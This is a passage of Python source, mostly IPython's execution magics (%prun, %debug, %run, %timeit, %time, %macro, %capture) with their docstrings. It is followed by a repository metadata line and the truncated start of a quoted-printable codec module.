empty) statement in the first line. Cell mode allows you to easily
profile multiline blocks without having to put them in a separate
function.
The given statement (which doesn't require quote marks) is run via the
python profiler in a manner similar to the profile.run() function.
Namespaces are internally managed to work correctly; profile.run
cannot be used in IPython because it makes certain assumptions about
namespaces which do not hold under IPython.
Options:
-l <limit>
you can place restrictions on what or how much of the
profile gets printed. The limit value can be:
* A string: only information for function names containing this string
is printed.
* An integer: only these many lines are printed.
* A float (between 0 and 1): this fraction of the report is printed
(for example, use a limit of 0.4 to see the topmost 40% only).
You can combine several limits with repeated use of the option. For
example, ``-l __init__ -l 5`` will print only the topmost 5 lines of
information about class constructors.
-r
return the pstats.Stats object generated by the profiling. This
object has all the information about the profile in it, and you can
later use it for further analysis or in other functions.
-s <key>
sort profile by given key. You can provide more than one key
by using the option several times: '-s key1 -s key2 -s key3...'. The
default sorting key is 'time'.
The following is copied verbatim from the profile documentation
referenced below:
When more than one key is provided, additional keys are used as
secondary criteria when the there is equality in all keys selected
before them.
Abbreviations can be used for any key names, as long as the
abbreviation is unambiguous. The following are the keys currently
defined:
============ =====================
Valid Arg Meaning
============ =====================
"calls" call count
"cumulative" cumulative time
"file" file name
"module" file name
"pcalls" primitive call count
"line" line number
"name" function name
"nfl" name/file/line
"stdname" standard name
"time" internal time
============ =====================
Note that all sorts on statistics are in descending order (placing
most time consuming items first), where as name, file, and line number
searches are in ascending order (i.e., alphabetical). The subtle
distinction between "nfl" and "stdname" is that the standard name is a
sort of the name as printed, which means that the embedded line
numbers get compared in an odd way. For example, lines 3, 20, and 40
would (if the file names were the same) appear in the string order
"20" "3" and "40". In contrast, "nfl" does a numeric compare of the
line numbers. In fact, sort_stats("nfl") is the same as
sort_stats("name", "file", "line").
-T <filename>
save profile results as shown on screen to a text
file. The profile is still shown on screen.
-D <filename>
save (via dump_stats) profile statistics to given
filename. This data is in a format understood by the pstats module, and
is generated by a call to the dump_stats() method of profile
objects. The profile is still shown on screen.
-q
suppress output to the pager. Best used with -T and/or -D above.
If you want to run complete programs under the profiler's control, use
``%run -p [prof_opts] filename.py [args to program]`` where prof_opts
contains profiler specific options as described here.
You can read the complete documentation for the profile module with::
In [1]: import profile; profile.help()
"""
opts, arg_str = self.parse_options(parameter_s, 'D:l:rs:T:q',
list_all=True, posix=False)
if cell is not None:
arg_str += '\n' + cell
arg_str = self.shell.input_splitter.transform_cell(arg_str)
return self._run_with_profiler(arg_str, opts, self.shell.user_ns)
def _run_with_profiler(self, code, opts, namespace):
"""
Run `code` with profiler. Used by ``%prun`` and ``%run -p``.
Parameters
----------
code : str
Code to be executed.
opts : Struct
Options parsed by `self.parse_options`.
namespace : dict
A dictionary for Python namespace (e.g., `self.shell.user_ns`).
"""
# Fill default values for unspecified options:
opts.merge(Struct(D=[''], l=[], s=['time'], T=['']))
prof = profile.Profile()
try:
prof = prof.runctx(code, namespace, namespace)
sys_exit = ''
except SystemExit:
sys_exit = """*** SystemExit exception caught in code being profiled."""
stats = pstats.Stats(prof).strip_dirs().sort_stats(*opts.s)
lims = opts.l
if lims:
lims = [] # rebuild lims with ints/floats/strings
for lim in opts.l:
try:
lims.append(int(lim))
except ValueError:
try:
lims.append(float(lim))
except ValueError:
lims.append(lim)
# Trap output.
stdout_trap = StringIO()
stats_stream = stats.stream
try:
stats.stream = stdout_trap
stats.print_stats(*lims)
finally:
stats.stream = stats_stream
output = stdout_trap.getvalue()
output = output.rstrip()
if 'q' not in opts:
page.page(output)
print(sys_exit, end=' ')
dump_file = opts.D[0]
text_file = opts.T[0]
if dump_file:
prof.dump_stats(dump_file)
print('\n*** Profile stats marshalled to file',\
repr(dump_file)+'.',sys_exit)
if text_file:
pfile = open(text_file,'w')
pfile.write(output)
pfile.close()
print('\n*** Profile printout saved to text file',\
repr(text_file)+'.',sys_exit)
if 'r' in opts:
return stats
else:
return None
@line_magic
def pdb(self, parameter_s=''):
"""Control the automatic calling of the pdb interactive debugger.
Call as '%pdb on', '%pdb 1', '%pdb off' or '%pdb 0'. If called without
argument it works as a toggle.
When an exception is triggered, IPython can optionally call the
interactive pdb debugger after the traceback printout. %pdb toggles
this feature on and off.
The initial state of this feature is set in your configuration
file (the option is ``InteractiveShell.pdb``).
If you want to just activate the debugger AFTER an exception has fired,
without having to type '%pdb on' and rerunning your code, you can use
the %debug magic."""
par = parameter_s.strip().lower()
if par:
try:
new_pdb = {'off':0,'0':0,'on':1,'1':1}[par]
except KeyError:
print ('Incorrect argument. Use on/1, off/0, '
'or nothing for a toggle.')
return
else:
# toggle
new_pdb = not self.shell.call_pdb
# set on the shell
self.shell.call_pdb = new_pdb
print('Automatic pdb calling has been turned',on_off(new_pdb))
@skip_doctest
@magic_arguments.magic_arguments()
@magic_arguments.argument('--breakpoint', '-b', metavar='FILE:LINE',
help="""
Set break point at LINE in FILE.
"""
)
@magic_arguments.argument('statement', nargs='*',
help="""
Code to run in debugger.
You can omit this in cell magic mode.
"""
)
@line_cell_magic
def debug(self, line='', cell=None):
"""Activate the interactive debugger.
This magic command support two ways of activating debugger.
One is to activate debugger before executing code. This way, you
can set a break point, to step through the code from the point.
You can use this mode by giving statements to execute and optionally
a breakpoint.
The other one is to activate debugger in post-mortem mode. You can
activate this mode simply running %debug without any argument.
If an exception has just occurred, this lets you inspect its stack
frames interactively. Note that this will always work only on the last
traceback that occurred, so you must call this quickly after an
exception that you wish to inspect has fired, because if another one
occurs, it clobbers the previous one.
If you want IPython to automatically do this on every exception, see
the %pdb magic for more details.
"""
args = magic_arguments.parse_argstring(self.debug, line)
if not (args.breakpoint or args.statement or cell):
self._debug_post_mortem()
else:
code = "\n".join(args.statement)
if cell:
code += "\n" + cell
self._debug_exec(code, args.breakpoint)
def _debug_post_mortem(self):
self.shell.debugger(force=True)
def _debug_exec(self, code, breakpoint):
if breakpoint:
(filename, bp_line) = breakpoint.rsplit(':', 1)
bp_line = int(bp_line)
else:
(filename, bp_line) = (None, None)
self._run_with_debugger(code, self.shell.user_ns, filename, bp_line)
@line_magic
def tb(self, s):
"""Print the last traceback with the currently active exception mode.
See %xmode for changing exception reporting modes."""
self.shell.showtraceback()
@skip_doctest
@line_magic
def run(self, parameter_s='', runner=None,
file_finder=get_py_filename):
"""Run the named file inside IPython as a program.
Usage::
%run [-n -i -e -G]
[( -t [-N<N>] | -d [-b<N>] | -p [profile options] )]
( -m mod | file ) [args]
Parameters after the filename are passed as command-line arguments to
the program (put in sys.argv). Then, control returns to IPython's
prompt.
This is similar to running at a system prompt ``python file args``,
but with the advantage of giving you IPython's tracebacks, and of
loading all variables into your interactive namespace for further use
(unless -p is used, see below).
The file is executed in a namespace initially consisting only of
``__name__=='__main__'`` and sys.argv constructed as indicated. It thus
sees its environment as if it were being run as a stand-alone program
(except for sharing global objects such as previously imported
modules). But after execution, the IPython interactive namespace gets
updated with all variables defined in the program (except for __name__
and sys.argv). This allows for very convenient loading of code for
interactive work, while giving each program a 'clean sheet' to run in.
Arguments are expanded using shell-like glob match. Patterns
'*', '?', '[seq]' and '[!seq]' can be used. Additionally,
tilde '~' will be expanded into user's home directory. Unlike
real shells, quotation does not suppress expansions. Use
*two* back slashes (e.g. ``\\\\*``) to suppress expansions.
To completely disable these expansions, you can use -G flag.
Options:
-n
__name__ is NOT set to '__main__', but to the running file's name
without extension (as python does under import). This allows running
scripts and reloading the definitions in them without calling code
protected by an ``if __name__ == "__main__"`` clause.
-i
run the file in IPython's namespace instead of an empty one. This
is useful if you are experimenting with code written in a text editor
which depends on variables defined interactively.
-e
ignore sys.exit() calls or SystemExit exceptions in the script
being run. This is particularly useful if IPython is being used to
run unittests, which always exit with a sys.exit() call. In such
cases you are interested in the output of the test results, not in
seeing a traceback of the unittest module.
-t
print timing information at the end of the run. IPython will give
you an estimated CPU time consumption for your script, which under
Unix uses the resource module to avoid the wraparound problems of
time.clock(). Under Unix, an estimate of time spent on system tasks
is also given (for Windows platforms this is reported as 0.0).
If -t is given, an additional ``-N<N>`` option can be given, where <N>
must be an integer indicating how many times you want the script to
run. The final timing report will include total and per run results.
For example (testing the script uniq_stable.py)::
In [1]: run -t uniq_stable
IPython CPU timings (estimated):
User : 0.19597 s.
System: 0.0 s.
In [2]: run -t -N5 uniq_stable
IPython CPU timings (estimated):
Total runs performed: 5
Times : Total Per run
User : 0.910862 s, 0.1821724 s.
System: 0.0 s, 0.0 s.
-d
run your program under the control of pdb, the Python debugger.
This allows you to execute your program step by step, watch variables,
etc. Internally, what IPython does is similar to calling::
pdb.run('execfile("YOURFILENAME")')
with a breakpoint set on line 1 of your file. You can change the line
number for this automatic breakpoint to be <N> by using the -bN option
(where N must be an integer). For example::
%run -d -b40 myscript
will set the first breakpoint at line 40 in myscript.py. Note that
the first breakpoint must be set on a line which actually does
something (not a comment or docstring) for it to stop execution.
Or you can specify a breakpoint in a different file::
%run -d -b myotherfile.py:20 myscript
When the pdb debugger starts, you will see a (Pdb) prompt. You must
first enter 'c' (without quotes) to start execution up to the first
breakpoint.
Entering 'help' gives information about the use of the debugger. You
can easily see pdb's full documentation with "import pdb;pdb.help()"
at a prompt.
-p
run program under the control of the Python profiler module (which
prints a detailed report of execution times, function calls, etc).
You can pass other options after -p which affect the behavior of the
profiler itself. See the docs for %prun for details.
In this mode, the program's variables do NOT propagate back to the
IPython interactive namespace (because they remain in the namespace
where the profiler executes them).
Internally this triggers a call to %prun, see its documentation for
details on the options available specifically for profiling.
There is one special usage for which the text above doesn't apply:
if the filename ends with .ipy[nb], the file is run as ipython script,
just as if the commands were written on IPython prompt.
-m
specify module name to load instead of script path. Similar to
the -m option for the python interpreter. Use this option last if you
want to combine with other %run options. Unlike the python interpreter
only source modules are allowed no .pyc or .pyo files.
For example::
%run -m example
will run the example module.
-G
disable shell-like glob expansion of arguments.
"""
# get arguments and set sys.argv for program to be run.
opts, arg_lst = self.parse_options(parameter_s,
'nidtN:b:pD:l:rs:T:em:G',
mode='list', list_all=1)
if "m" in opts:
modulename = opts["m"][0]
modpath = find_mod(modulename)
if modpath is None:
warn('%r is not a valid modulename on sys.path'%modulename)
return
arg_lst = [modpath] + arg_lst
try:
filename = file_finder(arg_lst[0])
except IndexError:
warn('you must provide at least a filename.')
print('\n%run:\n', oinspect.getdoc(self.run))
return
except IOError as e:
try:
msg = str(e)
except UnicodeError:
msg = e.message
error(msg)
return
if filename.lower().endswith(('.ipy', '.ipynb')):
with preserve_keys(self.shell.user_ns, '__file__'):
self.shell.user_ns['__file__'] = filename
self.shell.safe_execfile_ipy(filename)
return
# Control the response to exit() calls made by the script being run
exit_ignore = 'e' in opts
# Make sure that the running script gets a proper sys.argv as if it
# were run from a system shell.
save_argv = sys.argv # save it for later restoring
if 'G' in opts:
args = arg_lst[1:]
else:
# tilde and glob expansion
args = shellglob(map(os.path.expanduser, arg_lst[1:]))
sys.argv = [filename] + args # put in the proper filename
# protect sys.argv from potential unicode strings on Python 2:
if not py3compat.PY3:
sys.argv = [ py3compat.cast_bytes(a) for a in sys.argv ]
if 'i' in opts:
# Run in user's interactive namespace
prog_ns = self.shell.user_ns
__name__save = self.shell.user_ns['__name__']
prog_ns['__name__'] = '__main__'
main_mod = self.shell.user_module
# Since '%run foo' emulates 'python foo.py' at the cmd line, we must
# set the __file__ global in the script's namespace
# TK: Is this necessary in interactive mode?
prog_ns['__file__'] = filename
else:
# Run in a fresh, empty namespace
if 'n' in opts:
name = os.path.splitext(os.path.basename(filename))[0]
else:
name = '__main__'
# The shell MUST hold a reference to prog_ns so after %run
# exits, the python deletion mechanism doesn't zero it out
# (leaving dangling references). See interactiveshell for details
main_mod = self.shell.new_main_mod(filename, name)
prog_ns = main_mod.__dict__
# pickle fix. See interactiveshell for an explanation. But we need to
# make sure that, if we overwrite __main__, we replace it at the end
main_mod_name = prog_ns['__name__']
if main_mod_name == '__main__':
restore_main = sys.modules['__main__']
else:
restore_main = False
# This needs to be undone at the end to prevent holding references to
# every single object ever created.
sys.modules[main_mod_name] = main_mod
if 'p' in opts or 'd' in opts:
if 'm' in opts:
code = 'run_module(modulename, prog_ns)'
code_ns = {
'run_module': self.shell.safe_run_module,
'prog_ns': prog_ns,
'modulename': modulename,
}
else:
if 'd' in opts:
# allow exceptions to raise in debug mode
code = 'execfile(filename, prog_ns, raise_exceptions=True)'
else:
code = 'execfile(filename, prog_ns)'
code_ns = {
'execfile': self.shell.safe_execfile,
'prog_ns': prog_ns,
'filename': get_py_filename(filename),
}
try:
stats = None
if 'p' in opts:
stats = self._run_with_profiler(code, opts, code_ns)
else:
if 'd' in opts:
bp_file, bp_line = parse_breakpoint(
opts.get('b', ['1'])[0], filename)
self._run_with_debugger(
code, code_ns, filename, bp_line, bp_file)
else:
if 'm' in opts:
def run():
self.shell.safe_run_module(modulename, prog_ns)
else:
if runner is None:
runner = self.default_runner
if runner is None:
runner = self.shell.safe_execfile
def run():
runner(filename, prog_ns, prog_ns,
exit_ignore=exit_ignore)
if 't' in opts:
# timed execution
try:
nruns = int(opts['N'][0])
if nruns < 1:
error('Number of runs must be >=1')
return
except (KeyError):
nruns = 1
self._run_with_timing(run, nruns)
else:
# regular execution
run()
if 'i' in opts:
self.shell.user_ns['__name__'] = __name__save
else:
# update IPython interactive namespace
# Some forms of read errors on the file may mean the
# __name__ key was never set; using pop we don't have to
# worry about a possible KeyError.
prog_ns.pop('__name__', None)
with preserve_keys(self.shell.user_ns, '__file__'):
self.shell.user_ns.update(prog_ns)
finally:
# It's a bit of a mystery why, but __builtins__ can change from
# being a module to becoming a dict missing some key data after
# %run. As best I can see, this is NOT something IPython is doing
# at all, and similar problems have been reported before:
# http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-10/0188.html
# Since this seems to be done by the interpreter itself, the best
# we can do is to at least restore __builtins__ for the user on
# exit.
self.shell.user_ns['__builtins__'] = builtin_mod
# Ensure key global structures are restored
sys.argv = save_argv
if restore_main:
sys.modules['__main__'] = restore_main
else:
# Remove from sys.modules the reference to main_mod we'd
# added. Otherwise it will trap references to objects
# contained therein.
del sys.modules[main_mod_name]
return stats
def _run_with_debugger(self, code, code_ns, filename=None,
bp_line=None, bp_file=None):
"""
Run `code` in debugger with a break point.
Parameters
----------
code : str
Code to execute.
code_ns : dict
A namespace in which `code` is executed.
filename : str
`code` is ran as if it is in `filename`.
bp_line : int, optional
Line number of the break point.
bp_file : str, optional
Path to the file in which break point is specified.
`filename` is used if not given.
Raises
------
UsageError
If the break point given by `bp_line` is not valid.
"""
deb = self.shell.InteractiveTB.pdb
if not deb:
self.shell.InteractiveTB.pdb = self.shell.InteractiveTB.debugger_cls()
deb = self.shell.InteractiveTB.pdb
# deb.checkline() fails if deb.curframe exists but is None; it can
# handle it not existing. https://github.com/ipython/ipython/issues/10028
if hasattr(deb, 'curframe'):
del deb.curframe
# reset Breakpoint state, which is moronically kept
# in a class
bdb.Breakpoint.next = 1
bdb.Breakpoint.bplist = {}
bdb.Breakpoint.bpbynumber = [None]
if bp_line is not None:
# Set an initial breakpoint to stop execution
maxtries = 10
bp_file = bp_file or filename
checkline = deb.checkline(bp_file, bp_line)
if not checkline:
for bp in range(bp_line + 1, bp_line + maxtries + 1):
if deb.checkline(bp_file, bp):
break
else:
msg = ("\nI failed to find a valid line to set "
"a breakpoint\n"
"after trying up to line: %s.\n"
"Please set a valid breakpoint manually "
"with the -b option." % bp)
raise UsageError(msg)
# if we find a good linenumber, set the breakpoint
deb.do_break('%s:%s' % (bp_file, bp_line))
if filename:
# Mimic Pdb._runscript(...)
deb._wait_for_mainpyfile = True
deb.mainpyfile = deb.canonic(filename)
# Start file run
print("NOTE: Enter 'c' at the %s prompt to continue execution." % deb.prompt)
try:
if filename:
# save filename so it can be used by methods on the deb object
deb._exec_filename = filename
while True:
try:
deb.run(code, code_ns)
except Restart:
print("Restarting")
if filename:
deb._wait_for_mainpyfile = True
deb.mainpyfile = deb.canonic(filename)
continue
else:
break
except:
etype, value, tb = sys.exc_info()
# Skip three frames in the traceback: the %run one,
# one inside bdb.py, and the command-line typed by the
# user (run by exec in pdb itself).
self.shell.InteractiveTB(etype, value, tb, tb_offset=3)
@staticmethod
def _run_with_timing(run, nruns):
"""
Run function `run` and print timing information.
Parameters
----------
run : callable
Any callable object which takes no argument.
nruns : int
Number of times to execute `run`.
"""
twall0 = time.time()
if nruns == 1:
t0 = clock2()
run()
t1 = clock2()
t_usr = t1[0] - t0[0]
t_sys = t1[1] - t0[1]
print("\nIPython CPU timings (estimated):")
print(" User : %10.2f s." % t_usr)
print(" System : %10.2f s." % t_sys)
else:
runs = range(nruns)
t0 = clock2()
for nr in runs:
run()
t1 = clock2()
t_usr = t1[0] - t0[0]
t_sys = t1[1] - t0[1]
print("\nIPython CPU timings (estimated):")
print("Total runs performed:", nruns)
print(" Times : %10s %10s" % ('Total', 'Per run'))
print(" User : %10.2f s, %10.2f s." % (t_usr, t_usr / nruns))
print(" System : %10.2f s, %10.2f s." % (t_sys, t_sys / nruns))
twall1 = time.time()
print("Wall time: %10.2f s." % (twall1 - twall0))
@skip_doctest
@line_cell_magic
def timeit(self, line='', cell=None):
"""Time execution of a Python statement or expression
Usage, in line mode:
%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] statement
or in cell mode:
%%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] setup_code
code
code...
Time execution of a Python statement or expression using the timeit
module. This function can be used both as a line and cell magic:
- In line mode you can time a single-line statement (though multiple
ones can be chained with using semicolons).
- In cell mode, the statement in the first line is used as setup code
(executed but not timed) and the body of the cell is timed. The cell
body has access to any variables created in the setup code.
Options:
-n<N>: execute the given statement <N> times in a loop. If this value
is not given, a fitting value is chosen.
-r<R>: repeat the loop iteration <R> times and take the best result.
Default: 3
-t: use time.time to measure the time, which is the default on Unix.
This function measures wall time.
-c: use time.clock to measure the time, which is the default on
Windows and measures wall time. On Unix, resource.getrusage is used
instead and returns the CPU user time.
-p<P>: use a precision of <P> digits to display the timing result.
Default: 3
-q: Quiet, do not print result.
-o: return a TimeitResult that can be stored in a variable to inspect
the result in more details.
Examples
--------
::
In [1]: %timeit pass
10000000 loops, best of 3: 53.3 ns per loop
In [2]: u = None
In [3]: %timeit u is None
10000000 loops, best of 3: 184 ns per loop
In [4]: %timeit -r 4 u == None
1000000 loops, best of 4: 242 ns per loop
In [5]: import time
In [6]: %timeit -n1 time.sleep(2)
1 loop, best of 3: 2 s per loop
The times reported by %timeit will be slightly higher than those
reported by the timeit.py script when variables are accessed. This is
due to the fact that %timeit executes the statement in the namespace
of the shell, compared with timeit.py, which uses a single setup
statement to import function or create variables. Generally, the bias
does not matter as long as results from timeit.py are not mixed with
those from %timeit."""
opts, stmt = self.parse_options(line,'n:r:tcp:qo',
posix=False, strict=False)
if stmt == "" and cell is None:
return
timefunc = timeit.default_timer
number = int(getattr(opts, "n", 0))
repeat = int(getattr(opts, "r", timeit.default_repeat))
precision = int(getattr(opts, "p", 3))
quiet = 'q' in opts
return_result = 'o' in opts
if hasattr(opts, "t"):
timefunc = time.time
if hasattr(opts, "c"):
timefunc = clock
timer = Timer(timer=timefunc)
# this code has tight coupling to the inner workings of timeit.Timer,
# but is there a better way to achieve that the code stmt has access
# to the shell namespace?
transform = self.shell.input_splitter.transform_cell
if cell is None:
# called as line magic
ast_setup = self.shell.compile.ast_parse("pass")
ast_stmt = self.shell.compile.ast_parse(transform(stmt))
else:
ast_setup = self.shell.compile.ast_parse(transform(stmt))
ast_stmt = self.shell.compile.ast_parse(transform(cell))
ast_setup = self.shell.transform_ast(ast_setup)
ast_stmt = self.shell.transform_ast(ast_stmt)
# This codestring is taken from timeit.template - we fill it in as an
# AST, so that we can apply our AST transformations to the user code
# without affecting the timing code.
timeit_ast_template = ast.parse('def inner(_it, _timer):\n'
' setup\n'
' _t0 = _timer()\n'
' for _i in _it:\n'
' stmt\n'
' _t1 = _timer()\n'
' return _t1 - _t0\n')
timeit_ast = TimeitTemplateFiller(ast_setup, ast_stmt).visit(timeit_ast_template)
timeit_ast = ast.fix_missing_locations(timeit_ast)
# Track compilation time so it can be reported if too long
# Minimum time above which compilation time will be reported
tc_min = 0.1
t0 = clock()
code = self.shell.compile(timeit_ast, "<magic-timeit>", "exec")
tc = clock()-t0
ns = {}
exec(code, self.shell.user_ns, ns)
timer.inner = ns["inner"]
# This is used to check if there is a huge difference between the
# best and worst timings.
# Issue: https://github.com/ipython/ipython/issues/6471
worst_tuning = 0
if number == 0:
# determine number so that 0.2 <= total time < 2.0
number = 1
for _ in range(1, 10):
time_number = timer.timeit(number)
worst_tuning = max(worst_tuning, time_number / number)
if time_number >= 0.2:
break
number *= 10
all_runs = timer.repeat(repeat, number)
best = min(all_runs) / number
worst = max(all_runs) / number
if worst_tuning:
worst = max(worst, worst_tuning)
if not quiet :
# Check best timing is greater than zero to avoid a
# ZeroDivisionError.
# In cases where the slowest timing is lesser than a micosecond
# we assume that it does not really matter if the fastest
# timing is 4 times faster than the slowest timing or not.
if worst > 4 * best and best > 0 and worst > 1e-6:
print("The slowest run took %0.2f times longer than the "
"fastest. This could mean that an intermediate result "
"is being cached." % (worst / best))
if number == 1: # No s at "loops" if only one loop
print(u"%d loop, best of %d: %s per loop" % (number, repeat,
_format_time(best, precision)))
else:
print(u"%d loops, best of %d: %s per loop" % (number, repeat,
_format_time(best, precision)))
if tc > tc_min:
print("Compiler time: %.2f s" % tc)
if return_result:
return TimeitResult(number, repeat, best, worst, all_runs, tc, precision)
@skip_doctest
@needs_local_scope
@line_cell_magic
def time(self,line='', cell=None, local_ns=None):
"""Time execution of a Python statement or expression.
The CPU and wall clock times are printed, and the value of the
expression (if any) is returned. Note that under Win32, system time
is always reported as 0, since it can not be measured.
This function can be used both as a line and cell magic:
- In line mode you can time a single-line statement (though multiple
ones can be chained with using semicolons).
- In cell mode, you can time the cell body (a directly
following statement raises an error).
This function provides very basic timing functionality. Use the timeit
magic for more control over the measurement.
Examples
--------
::
In [1]: %time 2**128
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00
Out[1]: 340282366920938463463374607431768211456L
In [2]: n = 1000000
In [3]: %time sum(range(n))
CPU times: user 1.20 s, sys: 0.05 s, total: 1.25 s
Wall time: 1.37
Out[3]: 499999500000L
In [4]: %time print 'hello world'
hello world
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00
Note that the time needed by Python to compile the given expression
will be reported if it is more than 0.1s. In this example, the
actual exponentiation is done by Python at compilation time, so while
the expression can take a noticeable amount of time to compute, that
time is purely due to the compilation:
In [5]: %time 3**9999;
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00 s
In [6]: %time 3**999999;
CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
Wall time: 0.00 s
Compiler : 0.78 s
"""
# fail immediately if the given expression can't be compiled
if line and cell:
raise UsageError("Can't use statement directly after '%%time'!")
if cell:
expr = self.shell.input_transformer_manager.transform_cell(cell)
else:
expr = self.shell.input_transformer_manager.transform_cell(line)
# Minimum time above which parse time will be reported
tp_min = 0.1
t0 = clock()
expr_ast = self.shell.compile.ast_parse(expr)
tp = clock()-t0
# Apply AST transformations
expr_ast = self.shell.transform_ast(expr_ast)
# Minimum time above which compilation time will be reported
tc_min = 0.1
if len(expr_ast.body)==1 and isinstance(expr_ast.body[0], ast.Expr):
mode = 'eval'
source = '<timed eval>'
expr_ast = ast.Expression(expr_ast.body[0].value)
else:
mode = 'exec'
source = '<timed exec>'
t0 = clock()
code = self.shell.compile(expr_ast, source, mode)
tc = clock()-t0
# skew measurement as little as possible
glob = self.shell.user_ns
wtime = time.time
# time execution
wall_st = wtime()
if mode=='eval':
st = clock2()
out = eval(code, glob, local_ns)
end = clock2()
else:
st = clock2()
exec(code, glob, local_ns)
end = clock2()
out = None
wall_end = wtime()
# Compute actual times and report
wall_time = wall_end-wall_st
cpu_user = end[0]-st[0]
cpu_sys = end[1]-st[1]
cpu_tot = cpu_user+cpu_sys
# On windows cpu_sys is always zero, so no new information to the next print
if sys.platform != 'win32':
print("CPU times: user %s, sys: %s, total: %s" % \
(_format_time(cpu_user),_format_time(cpu_sys),_format_time(cpu_tot)))
print("Wall time: %s" % _format_time(wall_time))
if tc > tc_min:
print("Compiler : %s" % _format_time(tc))
if tp > tp_min:
print("Parser : %s" % _format_time(tp))
return out
@skip_doctest
@line_magic
def macro(self, parameter_s=''):
"""Define a macro for future re-execution. It accepts ranges of history,
filenames or string objects.
Usage:\\
%macro [options] name n1-n2 n3-n4 ... n5 .. n6 ...
Options:
-r: use 'raw' input. By default, the 'processed' history is used,
so that magics are loaded in their transformed version to valid
Python. If this option is given, the raw input as typed at the
command line is used instead.
-q: quiet macro definition. By default, a tag line is printed
to indicate the macro has been created, and then the contents of
the macro are printed. If this option is given, then no printout
is produced once the macro is created.
This will define a global variable called `name` which is a string
made of joining the slices and lines you specify (n1,n2,... numbers
above) from your input history into a single string. This variable
acts like an automatic function which re-executes those lines as if
you had typed them. You just type 'name' at the prompt and the code
executes.
The syntax for indicating input ranges is described in %history.
Note: as a 'hidden' feature, you can also use traditional python slice
notation, where N:M means numbers N through M-1.
For example, if your history contains (print using %hist -n )::
44: x=1
45: y=3
46: z=x+y
47: print x
48: a=5
49: print 'x',x,'y',y
you can create a macro with lines 44 through 47 (included) and line 49
called my_macro with::
In [55]: %macro my_macro 44-47 49
Now, typing `my_macro` (without quotes) will re-execute all this code
in one pass.
You don't need to give the line-numbers in order, and any given line
number can appear multiple times. You can assemble macros with any
lines from your input history in any order.
The macro is a simple object which holds its value in an attribute,
but IPython's display system checks for macros and executes them as
code instead of printing them when you type their name.
You can view a macro's contents by explicitly printing it with::
print macro_name
"""
opts,args = self.parse_options(parameter_s,'rq',mode='list')
if not args: # List existing macros
return sorted(k for k,v in iteritems(self.shell.user_ns) if\
isinstance(v, Macro))
if len(args) == 1:
raise UsageError(
"%macro insufficient args; usage '%macro name n1-n2 n3-4...")
name, codefrom = args[0], " ".join(args[1:])
#print 'rng',ranges # dbg
try:
lines = self.shell.find_user_code(codefrom, 'r' in opts)
except (ValueError, TypeError) as e:
print(e.args[0])
return
macro = Macro(lines)
self.shell.define_macro(name, macro)
if not ( 'q' in opts) :
print('Macro `%s` created. To execute, type its name (without quotes).' % name)
print('=== Macro contents: ===')
print(macro, end=' ')
@magic_arguments.magic_arguments()
@magic_arguments.argument('output', type=str, default='', nargs='?',
help="""The name of the variable in which to store output.
This is a utils.io.CapturedIO object with stdout/err attributes
for the text of the captured output.
CapturedOutput also has a show() method for displaying the output,
and __call__ as well, so you can use that to quickly display the
output.
If unspecified, captured output is discarded.
"""
)
@magic_arguments.argument('--no-stderr', action="store_true",
help="""Don't capture stderr."""
)
@magic_arguments.argument('--no-stdout', action="store_true",
help="""Don't capture stdout."""
)
@magic_arguments.argument('--no-display', action="store_true",
help="""Don't capture IPython's rich display."""
)
@cell_magic
def capture(self, line, cell):
"""run the cell, capturing stdout, stderr, and IPython's rich display() calls."""
args = magic_arguments.parse_argstring(self.capture, line)
out = not args.no_stdout
err = not args.no_stderr
disp = not args.no_display
with capture_output(out, err, disp) as io:
self.shell.run_cell(cell)
if args.output:
self.shell.user_ns[args.output] = io
def parse_breakpoint(text, current_file):
'''Returns (file, line) for file:line and (current_file, line) for line'''
colon = text.find(':')
if colon == -1:
return current_file, int(text)
else:
return text[:colon], int(text[colon+1:])
def _format_time(timespan, precision=3):
"""Formats the timespan in a human readable form"""
import math
if timespan >= 60.0:
# we have more than a minute, format that in a human readable form
# Idea from http://snipplr.com/view/5713/
parts = [("d", 60*60*24),("h", 60*60),("min", 60), ("s", 1)]
time = []
leftover = timespan
for suffix, length in parts:
value = int(leftover / length)
if value > 0:
leftover = leftover % length
time.append(u'%s%s' % (str(value), suffix))
if leftover < 1:
break
return " ".join(time)
# Unfortunately the unicode 'micro' symbol can cause problems in
# certain terminals.
# See bug: https://bugs.launchpad.net/ipython/+bug/348466
# Try to prevent crashes by being more secure than it needs to
# E.g. eclipse is able to print a µ, but has no sys.stdout.encoding set.
units = [u"s", u"ms",u'us',"ns"] # the save value
if hasattr(sys.stdout, 'encoding') and sys.stdout.encoding:
try:
u'\xb5'.encode(sys.stdout.encoding)
units = [u"s", u"ms",u'\xb5s',"ns"]
except:
pass
scaling = [1, 1e3, 1e6, 1e9]
if timespan > 0.0:
order = min(-int(math.floor(math.log10(timespan)) // 3), 3)
else:
order = 3
return u"%.*g %s" % (precision, timespan * scaling[order], units[order])
| apache-2.0 |
denfromufa/PTVS | Python/Tests/TestData/VirtualEnv/env/Lib/encodings/quopri_codec.py | 87 | 2222 | """Codec for quoted-printable encoding.
Like base64 and rot13, this returns Python strings, not Unicode.
"""
import codecs, quopri
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
def quopri_encode(input, errors='strict'):
"""Encode the input, returning a tuple (output object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
# using str() because of cStringIO's Unicode undesired Unicode behavior.
f = StringIO(str(input))
g = StringIO()
quopri.encode(f, g, 1)
output = g.getvalue()
return (output, len(input))
def quopri_decode(input, errors='strict'):
"""Decode the input, returning a tuple (output object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
f = StringIO(str(input))
g = StringIO()
quopri.decode(f, g)
output = g.getvalue()
return (output, len(input))
class Codec(codecs.Codec):
def encode(self, input,errors='strict'):
return quopri_encode(input,errors)
def decode(self, input,errors='strict'):
return quopri_decode(input,errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return quopri_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
